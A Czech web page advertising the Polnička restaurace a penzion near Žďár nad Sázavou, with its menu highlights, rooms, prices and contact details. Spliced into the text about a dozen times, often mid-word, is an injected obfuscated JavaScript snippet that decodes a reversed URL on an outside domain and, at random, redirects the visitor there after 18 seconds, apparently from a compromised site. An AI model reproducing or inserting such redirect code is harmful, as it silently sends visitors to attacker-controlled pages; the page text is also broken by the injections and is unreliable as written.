Rainbow page separator

POLNIČKA – restaurace a penzion

www.restauracepolnicka.cz

Restaurace a penzion PolničkaPENZION A RESTAURACE POLNIČKA  

Náš penzion a restaurace se nachází v obci Polnička  nedaleko Žďáru nad Sázavou. Přejeme Vám mnoho příjemných chvil a zážitků.

Restaurace Polnička Vám nabízí:

 • Široký výběr pokrmů, jídelní lístek
 • Velký výběr nealkoholických a nealkoholických nápojů
 • Široká škála kvalitních odrůdových vín a sektůRestaurace a penzion Polnička
 • Káva – BRISTOT
 • Pivo – Pilsner Urquell, Gambrinus
 • Grilování – speciality na grilu
 • Zvěřinové speciality

Vašim přáním a požadavkům vyjdeme maximálně vstříc.

Společenský sál o kapacitě 100 míst, vhodný pro:

 • svatby, promoce, rodinné oslavy
 • firemní akce, školení, rauty

Krytá venkovní terasa  s kapaci[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou 40 míst slouží našim hostům v letních měsících. Restaurace, formanka – 45 míst. Nově jsme pro rodiče s dětmi připravili dětský koutek a venkovní hřiště, ve kterém se děti zabaví během času stráveného v naší restauraci.

PENZIONRestaurace a penzion Polnička

Nejen zákazníkům naší restaurace nabízíme možnost uby[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování v 50-ti m vzdáleném penzionu rodinného typu v příjemném prostředí Českomoravské vrchoviny.

Penzion se společně s restaurací nachází 3 km od Žďáru nad Sázavou v obci Polnička. Mís[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to je ideální jako výchozí bod pro cykloturistiku a lyžování.V blízkosti se nachází Pilák – Rekreační oblast Pilská nádrž – mís[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to vhodné pro rybolov, koupání, houbaření.

Restaurace a penzion PolničkaObjekt penzionu je rozdělen do dvou částí s vlastním vchodem. V jedné části se nachází 6 dvoulůžkových pokojů s vlastním sociálním zařízením (sprchový kout, wc, umyvadlo) a televizorem. K dispozici je společná vybavené kuchyňka. V druhé části s vlastním vchodem se nachází apartmán 3 + 1 se třemi ložnicemi, zařízenou kuchyní a soc. zařízením (vana, wc, umyvadlo).

V přízemí penzionu se nachází klenutá společenská místnost pro např. večerní posezení.

Dále mají zákazníci možnost využít venkovní posezení pod zastřešenou terasou, gril na dřevěné uhlí, dětské pískoviště a upravené ohniště. Samozřejmostí je úschovna jízdních kol. 

Cena uby[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování mimo sezónu:

 • jednolůžkový pokoj – 550 Kč
 • dvoulůžkový pokoj – 700 KčRestaurace a penzion Polnička
 • třílůžkový pokoj – 900 Kč
 • apartmán (až 6 osob) – 1400 Kč
 • při pobytu delším jak 3 noci (4 a více):

4 500 Kč /noc za celý objekt (tj při obsazení 18 osob = 250 Kč/osoba/noc)

 • rekreační poplatek placený obecnímu úřadu 15 Kč /osoba/noc
 • pes: 100 Kč / noc

Cena uby[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování v sezóně (tj. od 1.6. do 30.9.2021 je možné uby[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování pouze minimálně na 3 noci):

 • jednolůžkový – 550 Kč
 • dvoulůžkový – 800 Kč
 • třílůžkový – 1000 Kč
 • apartmán – 1600 Kč

Celý penzion je samozřejmě k dispozici pro hosty restaurace při konání rodinných oslav a firemních akcí.

Stravování:

 • Možnost stravování je vlastní. Strava připravená ve vybavených kuchyních nebo stravování v naší vyhlášené restauraci vzdálené 50 m od penzionu.
 • Pokud byste měli zájem o snídani v naší restaurace, rádi Vám ji připravíme.
 • Cena snídaně: 150,- Kč /osoba
 • Obědy a večere máte možnost  si vybrat z našeho bohatého jídelního lístku.

Kontakt:

RESTAURACE A PENZION POLNIČKAwifi
Polnička 51
591 02 Žďár nad Sázavou

Tel.: 566 629 374
E-mail: [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:simak.restaurace@seznam.cz“>simak.restaurace@seznam.cz
Web: www.restauracepolnicka.cz

Otevírací doba:

 • po – čt          11:00 – 22:00
 • pá – so          11:00 – 23:00
 • ne                11:00 – 22:00

[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}togalerie“ target=“_blank“ rel=“noopener“>Fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}togalerie